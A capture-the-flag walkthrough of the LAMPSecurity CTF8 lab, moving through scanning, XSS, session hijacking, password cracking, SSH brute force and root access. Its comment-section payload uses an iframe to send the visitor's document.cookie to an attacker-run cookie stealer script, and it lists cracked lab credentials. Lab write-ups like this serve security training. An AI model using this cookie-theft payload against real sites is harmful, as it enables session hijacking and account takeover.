LAMP Security CTF8 Walk through

In this article I am going to capture the flag for the LampSecurity CTF 8 Challenges. This is a beginner level challenge. We will start with scanning the environment and end with getting the root access, In between my target will be capture the hidden flags. So let’s get started.

List of actions:

•  Scan the network
•   HTTP enumeration.
•  Web vulnerability scanning
•  Spidering Web directory
•  Session hijack
•  Crack the password
•  Brute-forcing SSH credentials
•  Get the access and capture the flags
•  Root privilege

Before start the scanning lets discover the network first with netdiscover.

We have successfully discover our target

1      Scan the network

We will start with network scan with nmap. For this lets execute the below command in Kali console.

After the result we found the following ports are open in the output.

-          21

-          22

-          25

-          80

-          110

-          111

-          139

-          143

-          443

-          445

-          993

-          995

-          3306

-          5801,5802,5901,5902,5903,5904

-          6001,6002,6004,6003

Based on the above result it is confirmed there is a web application running on port 80 so we will chose our start point with the same.

2      Web vulnerability scanning

Let’s scan the web application with Nikto and try to discover the present vulnerability.

After the scan we got the below results which is important for our upcoming walk through.

-          Phpinfo.php page is available to access

-          The application is vulnerable to XXS attack.

Now during exploring the web application, let’s check the source code of the home page.

We have successfully captured our first flag.

#flag#550e1bafe077ff0b0b67f4e32f29d751

After got the first flag we will go with the nikto result and try to explore the phpinfo page.

Great!! We have got our second flag in a row.

#flag#550e1bafe077ff0b0b67f4e32f29d751

3      Spidering Web directory

Now come to home page and read any of the article to get further clue.

While exploring the page I have got a new directory which was not displayed during the vulnerability scan. So we will scan the directory using dirb to get any useful information.

After the scanning result I have got something different which push me to think to check further

Lets try to explore the above path and see what else we can get

Bingo! We have got our third flag

#flag#57dbe55b42b307fb4115146d239955d0

4      Session hijack

Now let’s create a user account to get the user access

I have successfully created one user named “iamuser”. Now got any of the blog and try to check if the comment section is vulnerable to XXS.

Enter the below script and click on preview

<script>alert(‘hi’)</script>

From the above result it is clear the application is vulnerable to XSS.

Now we will try to hijack the session cookie of the writer of the blog and forward it to cookie capture application running inside our own server. To know more please click here to read previous article.

For doing this please paste the below HTML code inside the command box and save it.

<html>
<body>
<b> wanteddev</b>
<u>click me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.1.2/Cookie_stealer.php?c="+document.cookie)> </iframe >
</body>
</html>

Now the above code will give us the session ID whoever visit the comment in the first place. Here we will make the blog writer visit the link to get the cookie id and highjack his session. For doing that we will send the link to him via email and we will wait until and unless he clicks on the link.

Now click on the username 

After that you have to paste the link in contact form and send to the user.

Now wait for couple of minutes we will get the session id inside our server.

We have successfully got the session id

 

Now we will try to get the session by pasting the copied session id using the cookie manager firefox plugin.

Now our next step will be post the sql query and try to fetch the user details.

As we know Drupal’s default table is user and the columns for user and password are user,pass respectively.

So please goto content management and create content, then click on page, now copy and paste the below sql with php code, select the content type as php and then cleck on preview.

You will successfully get the current user details with the md5 password hash.

5      Crack the password

Save it in a file and try to crack using john the ripper tool.

After the cracking process we have got the below results

6      Brute-forcing SSH credentials

Let’s save the users and password in separate files to do our next step which is brute forcing the SSH login.

After that lets execute the below command in the terminal.

And wait to get success message.

So sad, we did not get any success. Still don’t have to worry let’s explore the blogger profile and see if we get any hint further.

From the above screenshot we can see the user Steve is having his user name in the email as spinkton. Similarly we will check each and every user profile by editing the URL and store the user name inside a file.

Now lets try to brute-force again with the new user list.

This time we have got three SUCCESS credentials. Following:

bdio – passw0rd

jharraway – letmein!

spinkton – football123

7      Get the access and capture the flags

Let’s try to login one by one

Great we have got another flag here

Now try to login with the next credential. Nice! We have got another flag inside this.

Let’s move to the next credential. Again! We have got one more flag inside.

8      Root privilege

After all this let’s try to do sudo login to check if this user has root privilege.

Awesome!! We have successfully got the root user.

Thanks for read my article. Please let me know your valuable feedback in the comment section below.